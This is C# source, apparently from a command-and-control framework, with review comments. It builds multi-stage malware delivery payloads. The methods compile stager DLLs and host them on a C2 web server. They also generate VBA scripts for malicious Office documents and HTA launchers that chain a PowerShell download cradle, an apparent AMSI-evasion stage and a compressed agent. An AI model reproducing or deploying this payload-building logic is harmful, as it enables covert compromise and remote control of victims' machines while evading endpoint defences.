/// <summary>
/// Compiles the stager and shooter templates, registers the stager DLL as a web
/// resource on the C2 server, and writes the script text produced by
/// <c>VBAGenerator</c> to <c>filename</c> under the workspace's
/// <c>EVILCLIPPY_FOLDER</c> directory.
/// </summary>
/// <remarks>
/// Returns silently when <c>filename</c> or <c>lhost</c> is empty, when
/// <c>lport</c> or <c>profile</c> is below 1, or when the profile id is not
/// registered on the server. Any exception is caught and only its message is
/// printed to the console.
/// Artifacts visible in this method: two DLL names built from a random
/// 10-character string, a web resource published under the profile's ContentUri,
/// and one script file written inside the workspace folder.
/// </remarks>
private void Run()
{
    // NOTE(review): this list is never read anywhere in the method.
    List<string> args = new List<string>();

    try
    {
        // Nothing is built unless every required option has been set.
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }

        // Templates are read from <cwd>/WORKSPACE_FOLDER/TEMPLATE_FOLDER.
        string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

        // An unknown profile id ends the task without any message.
        if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
        {
            return;
        }

        // Stage 1: fill the stager template with the listener settings and compile it.
        var listenerProfile = Program.GetC2Manager().GetC2Server().GetProfile(profile);
        ListenerConfig conf = new ListenerConfig("", lhost, lport, listenerProfile, profile);

        string stagerSource = File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE));
        // The literal 35 is passed through to Replacer and Builder; its meaning is
        // defined there (presumably a target-framework selector, to be confirmed).
        stagerSource = Replacer.ReplaceAgentProfile(stagerSource, RedPeanut.Program.GetServerKey(), 35, conf);

        string stagerDllName = RandomAString(10, new Random()) + ".dll";
        Builder.GenerateDll(stagerSource, stagerDllName, 35);

        // Publish the compiled stager through the C2 web server.
        C2Manager c2manager = Program.GetC2Manager();
        c2manager.GetC2Server().RegisterWebResource(stagerDllName, new WebResourceInstance(null, stagerDllName));

        // Normalise the profile's content URI to "path/" (no leading slash, one trailing slash).
        string contentPrefix = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
        if (!contentPrefix.EndsWith("/"))
        {
            contentPrefix += "/";
        }

        string stagerResourcePath = contentPrefix + stagerDllName;

        // Stage 2: the shooter template receives the stager's resource path and is
        // compiled to a Base64 string.
        string shooterSource = File.ReadAllText(Path.Combine(templateDir, SHOOTER_TEMPLATE));
        shooterSource = Replacer.ReplaceAgentShooter(shooterSource, stagerResourcePath, conf);

        string shooterDllName = RandomAString(10, new Random()) + ".dll";
        string assemblyBase64 = Builder.GenerateDllBase64(shooterSource, shooterDllName, 35);

        VBAGenerator gen = new VBAGenerator(assemblyBase64, null);

        // Write the generated script to <cwd>/WORKSPACE_FOLDER/EVILCLIPPY_FOLDER/<filename>.
        // NOTE(review): filename is combined into the path without validation.
        string destDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
        string destFile = Path.Combine(destDir, filename);
        File.WriteAllText(destFile, gen.GetScriptText());
        Console.WriteLine("[*] {0} Created", destFile);
    }
    catch (Exception e)
    {
        // Every failure is reduced to its message; no stack trace is reported.
        Console.WriteLine("[*] Error running task build {0}", e.Message);
    }
}
/// <summary>
/// Builds an HTA launcher for the language selected in <c>lang</c> ("vbs" or
/// "powershell"). Depending on <c>hosted</c>, the result is either registered as
/// a web resource on the C2 server or written to the temp directory.
/// </summary>
/// <remarks>
/// Returns silently when <c>filename</c> or <c>lhost</c> is empty, when
/// <c>lport</c> or <c>profile</c> is below 1, or when the profile id is not
/// registered. Any other <c>lang</c> value prints a "not supported" message.
/// Any exception is caught and only its message is printed.
/// Artifacts visible in this method: resource and file names built from a random
/// 10-character string, a PowerShell third stage whose name carries the fixed
/// prefix "s2_", resources published under the profile's ContentUri, and, in
/// non-hosted mode, files written to <c>Path.GetTempPath()</c>.
/// </remarks>
private void Run()
{
    // NOTE(review): this list is never read anywhere in the method.
    List<string> args = new List<string>();

    try
    {
        // Nothing is built unless every required option has been set.
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }

        if (lang == "vbs")
        {
            string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

            // An unknown profile id ends the task without any message.
            if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                return;
            }

            // Stage 1: fill the stager template with the listener settings and compile it.
            var listenerProfile = Program.GetC2Manager().GetC2Server().GetProfile(profile);
            ListenerConfig conf = new ListenerConfig("", lhost, lport, listenerProfile, profile);

            string stagerSource = File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE));
            // The literal 35 is passed through to Replacer and Builder; its meaning is
            // defined there (presumably a target-framework selector, to be confirmed).
            stagerSource = Replacer.ReplaceAgentProfile(stagerSource, RedPeanut.Program.GetServerKey(), 35, conf);

            string stagerDllName = RandomAString(10, new Random()) + ".dll";
            Builder.GenerateDll(stagerSource, stagerDllName, 35);

            // Publish the compiled stager through the C2 web server.
            C2Manager c2manager = Program.GetC2Manager();
            c2manager.GetC2Server().RegisterWebResource(stagerDllName, new WebResourceInstance(null, stagerDllName));

            // Normalise the profile's content URI to "path/" (no leading slash, one trailing slash).
            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
            if (!uricontent.EndsWith("/"))
            {
                uricontent += "/";
            }

            string stagerResourcePath = uricontent + stagerDllName;

            // Stage 2: the shooter template receives the stager's resource path and is
            // compiled to a Base64 string.
            string shooterSource = File.ReadAllText(Path.Combine(templateDir, SHOOTER_TEMPLATE));
            shooterSource = Replacer.ReplaceAgentShooter(shooterSource, stagerResourcePath, conf);

            string shooterDllName = RandomAString(10, new Random()) + ".dll";
            string assemblyBase64 = Builder.GenerateDllBase64(shooterSource, shooterDllName, 35);

            HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);

            if (hosted)
            {
                // Hosted mode: the launcher is registered as a web resource and no file is written.
                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                Console.WriteLine("[*] Resource added to webserver resources");
                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                return;
            }

            // File mode: the launcher is written to the temp directory.
            // NOTE(review): filename is combined into the path without validation.
            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
        }
        else if (lang == "powershell")
        {
            string templateDir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

            // An unknown profile id ends the task without any message.
            if (!Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                return;
            }

            string psfilename = RandomString(10, new Random()) + ".ps1";

            var listenerProfile = Program.GetC2Manager().GetC2Server().GetProfile(profile);
            ListenerConfig conf = new ListenerConfig("", lhost, lport, listenerProfile, profile);

            // This branch passes 40 to the replacer and calls the two-argument
            // GenerateDllBase64 overload, unlike the vbs branch.
            string stagerSource = File.ReadAllText(Path.Combine(templateDir, STAGER_TEMPLATE));
            stagerSource = Replacer.ReplaceAgentProfile(stagerSource, RedPeanut.Program.GetServerKey(), 40, conf);

            string agentDllName = RandomString(10, new Random()) + ".dll";
            string assemblyBase64 = Builder.GenerateDllBase64(stagerSource, agentDllName);

            // Placeholder values handed to the first two script generators.
            Dictionary<string, string> arg = new Dictionary<string, string>();
            arg.Add("#{lhost}", lhost);
            arg.Add("#{lport}", lport.ToString());

            // Normalise the profile's content URI to "path/" (no leading slash, one trailing slash).
            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
            uricontent = uricontent.TrimStart('/');
            if (!uricontent.EndsWith("/"))
            {
                uricontent += "/";
            }

            string agentStageName = "s2_" + psfilename;
            arg.Add("#{uri}", uricontent + agentStageName);

            // The assembly is re-encoded as compressed Base64. The length of the
            // uncompressed bytes is what the agent stage receives as #{bytelen}.
            byte[] assemblyBytes = Convert.FromBase64String(assemblyBase64);
            string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblyBytes));

            Dictionary<string, string> argagent = new Dictionary<string, string>();
            argagent.Add("#{bytelen}", assemblyBytes.Length.ToString());

            // One generator per stage. The HTA wraps the script text of gen_s0.
            // What each generator emits is defined outside this method.
            PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
            PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
            PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
            HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);

            if (hosted)
            {
                // Hosted mode: all three stages are registered as web resources.
                C2Manager c2manager = Program.GetC2Manager();
                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                c2manager.GetC2Server().RegisterWebResource(agentStageName, new WebResourceInstance(gen_s2, agentStageName));
                Console.WriteLine("[*] Resource added to webserver resources");
                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                return;
            }

            // File mode: all three stages are written to the temp directory.
            // NOTE(review): filename is combined into the path without validation.
            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
            File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
            File.WriteAllText(Path.Combine(Path.GetTempPath(), agentStageName), gen_s2.GetScriptText());
            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), agentStageName));
        }
        else
        {
            Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
        }
    }
    catch (Exception e)
    {
        // Every failure is reduced to its message; no stack trace is reported.
        Console.WriteLine("[*] Error running task build {0}", e.Message);
    }
}